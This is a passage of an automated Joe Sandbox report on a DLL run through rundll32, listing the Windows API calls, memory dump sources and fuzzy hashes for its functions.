                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                    • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                    • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3704204646-0
                                                                                                                    • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                    • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                    • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                    • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetFocus.USER32 ref: 10015607
                                                                                                                    • GetParent.USER32(?), ref: 10015615
                                                                                                                    • SendMessageA.USER32 ref: 10015628
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4211600527-0
                                                                                                                    • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                    • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                    • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                    • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2353593579-0
                                                                                                                    • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                    • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                    • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                    • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                      • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                    • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 369458955-0
                                                                                                                    • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                    • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                    • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                    • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                    • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                    • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                    • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                    • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3384502665-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                      • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                    • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                    • __lock.LIBCMT ref: 1003A581
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                    • InterlockedIncrement.KERNEL32(00361520), ref: 1003A5C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880340415-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCB3
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCC0
                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ActiveEnable$FreeResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 253586258-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                    • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                      • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                      • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 685759847-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1473721057-3887548279
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 431132790-2766056989
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                    • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                      • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                      • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                    • String ID: %s.dll
                                                                                                                    • API String ID: 3444012488-3668843792
                                                                                                                    • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                    • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                    • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                    • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4100373531-0
                                                                                                                    • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                    • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                    • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                    • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                    • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2949335588-0
                                                                                                                    • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                    • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                    • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                    • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                    • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253506028-0
                                                                                                                    • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                    • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                    • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                    • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                    • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                    Memory Dump Source
